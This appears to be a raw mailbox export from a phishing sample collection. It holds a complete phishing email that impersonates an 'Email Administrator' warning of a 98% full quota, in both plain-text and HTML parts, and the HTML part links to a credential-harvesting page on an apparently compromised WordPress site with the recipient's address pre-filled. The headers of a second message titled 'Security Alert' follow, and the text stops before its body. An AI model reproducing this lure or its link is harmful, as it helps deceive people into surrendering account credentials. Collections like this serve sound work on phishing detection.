From: "Administrator" <xaor4@free.fr>
Date: Mon, 26 Feb 2018 14:13:58 -0600
Message-Id: <20180226201359.E271F8686D@5mdh-xrrz.accessdomain.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 433

You will not see this in a MIME-aware mail reader.
--===============1575944846==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

   =

    	  =

    =

    Mail Quota: (98% Full) 	  =


 =

   Attention: jose@monkey.org =


Your email quota has reached 98% and will soon exceed its limit. =

Follow the URL below to upgrade your quota to 25GB for free to avoid loss o=
f email data. =


Upgrade Email Quota =



Source: Email Administrator=20
--===============1575944846==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV>&nbsp;</DIV>
<DIV>
<TABLE>
<TBODY>
<TR>
<TD width=3D30>&nbsp;</TD>
<TD>
<TABLE>
<TBODY>
<TR>
<TD>
<TABLE style=3D"-moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml=
-border-radius: 3px; border-radius: 3px" cellSpacing=3D0>
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: #ff0000 1px solid; HEIGHT: 25px; BORDER-RIGHT: #ff=
0000 1px solid; BORDER-BOTTOM: #ff0000 1px solid; BORDER-LEFT: #ff0000 1px =
solid; WIDTH: 500px; BACKGROUND-COLOR: #ff0000">
<DIV align=3Dcenter><SPAN style=3D"FONT-SIZE: small; FONT-FAMILY: calibri; =
COLOR: #ffffff">Mail Quota: (98% Full) </SPAN></DIV></TD>
<TD style=3D"BORDER-TOP: #1d7c0e 1px solid; HEIGHT: 25px; BORDER-RIGHT: #1d=
7c0e 1px solid; BORDER-BOTTOM: #1d7c0e 1px solid; BORDER-LEFT: #1d7c0e 1px =
solid; WIDTH: 15px; BACKGROUND-COLOR: #1d7c0e">&nbsp;</TD></TR></TBODY></TA=
BLE></TD></TR></TBODY></TABLE><BR>
<TABLE align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"BORDER-TOP: #1d7c0e 1px solid; HEIGHT: 200px; BORDER-RIGHT: #1=
d7c0e 1px solid; BORDER-BOTTOM: #1d7c0e 1px solid; PADDING-BOTTOM: 25px; PA=
DDING-TOP: 25px; PADDING-LEFT: 25px; BORDER-LEFT: #1d7c0e 1px solid; PADDIN=
G-RIGHT: 25px; WIDTH: 470px; BACKGROUND-COLOR: #ffffff"><SPAN style=3D"FONT=
-SIZE: small; FONT-FAMILY: verdana">Attention: <STRONG>jose@monkey.org</STR=
ONG> <BR><BR>Your email quota has reached 98% and will soon exceed its limi=
t. <BR>Follow the URL below to upgrade your quota to <STRONG>25GB</STRONG> =
for free to avoid loss of email data.&nbsp;<BR><BR><A href=3D"https://www.i=
mago-construction.com/wp-includes/js/vfgff/error.php?email=3Djose@monkey.or=
g" rel=3Dnoopener target=3D_blank><STRONG>Upgrade Email Quota </STRONG></A>=
</SPAN><A href=3D"https://www.imago-construction.com/wp-includes/js/vfgff/e=
rror.php?email=3Djose@monkey.org" rel=3Dnoopener target=3D_blank></A><BR><B=
R><BR>Source: <STRONG>Email Administrator</STRONG> </TD></TR></TBODY></TABL=
E></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============1575944846==--

From jose@monkey.org Tue Feb 27 01:38:32 2018 +0000
Return-Path: kristie.werner@nwea.org
Delivered-To: jose@monkey.org
X-FDA: 73885173264.04.tub65_4a737fa743a13
X-Spam-Summary: 60,1,0,87ea37360c58c75b,d41d8cd98f00b204,kristie.werner@nwea.org,:kristie.werner@nwea.org,RULES_HIT:2:41:72:196:327:355:379:474:582:800:962:967:969:973:978:983:988:989:1152:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1622:1710:1719:1730:1777:1792:2194:2198:2199:2200:2525:2527:2539:2560:2567:2610:2612:2682:2685:2693:2741:2820:2859:2890:2892:2894:2898:2900:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3352:3586:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:3976:4042:4051:4250:4321:4362:4384:5007:6650:6653:6671:6678:6996:6997:7652:7801:7974:8583:8599:8603:8957:9025:9121:9149:9177:9199:9388:9411:9416:9466:9908:10049:10216:10305:10346:11026:11233:11473:11657:11658:11914:12043:12217:12438:12555:12679:12740:12895:12903:12963:12986:13007:13019:13046:13132:13139:13231:13235:13236:13237:13241:13374:13439:13846:14141:14827:2108
X-HE-Tag: tub65_4a737fa743a13
X-Filterd-Recvd-Size: 20402
Received: from NAM03-DM3-obe.outbound.protection.outlook.com (mail-dm3nam03hn0230.outbound.protection.outlook.com [104.47.41.230])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 27 Feb 2018 01:38:31 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=nwea.onmicrosoft.com;
 s=selector1-nwea-org;
 h=From:Date:Subject:Message-ID:Content-Type:MIME-Version;
 bh=Y9zFGQ1/vivGlQUv/+A8a98BzYZoJwiVZsD9WyZNDQo=;
 b=B1OvTFc1G6FgviniC/GJi2c4iQOFj9xcR8LkEs9YIImggkdLNiz9iLjMevnor+yYMJTzHPJ9iUdx4jhmUlw+xzWluUSnmMVD8QAdSQ3TMtUgJYWixg8WZaZNA4Asor32ZK2tGbOZFcQIKqZYmXzTgSJGwu7xnOQAro+83SLvqa8=
Authentication-Results: spf=none (sender IP is )
 smtp.mailfrom=kristie.werner@nwea.org; 
Received: from [169.254.192.245] (166.130.91.138) by
 BY2PR06MB090.namprd06.prod.outlook.com (10.242.43.22) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.527.15; Tue, 27 Feb 2018 01:38:17 +0000
Content-Type: multipart/alternative; boundary="===============1047869888=="
MIME-Version: 1.0
Subject: Security Alert
To: "Valued.Customer" <kristie.werner@nwea.org>
